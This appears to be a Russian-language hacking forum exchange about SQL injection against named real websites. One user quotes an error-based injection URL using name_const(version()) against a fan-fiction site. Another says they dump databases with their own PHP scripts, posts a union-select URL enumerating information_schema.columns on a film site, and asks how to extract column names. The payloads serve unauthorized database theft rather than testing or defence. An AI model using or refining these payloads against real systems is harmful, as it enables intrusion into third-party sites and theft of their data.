Сообщение от
Tigger
Потому что скуля там не в GET-параметре, а в URI:
http://www.fanfics.ru/read.php?id=3&'and(select*from(select(name_const(v ersion(),1)),name_const(version(),1))a)and(1)='1
Посмотри внимательно на запрос, а вывод все-ровно есть, магия!!11
А ты, судя по всему, юзаешь FF, который урлэнкодит запросы. Используй другой браузер, или ставь патч для FF (https://rdot.org/forum/showthread.php?t=1403)
точняк, в опере норм открывает, единственная трабла, я сливаю базы через свои php скрипты, и они также как и фф нехотят выодить как нужно, мб есть какое решение?
и сразу ещо вопрос, таблицы выводит нормально, колонки нехочет
http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3, 4,5,6,7,8,9,10,11,column_name,13,14,15,16,17,18,19 ,20,21+from+information_schema.columns+where+limit +0,1--+
как их вывести?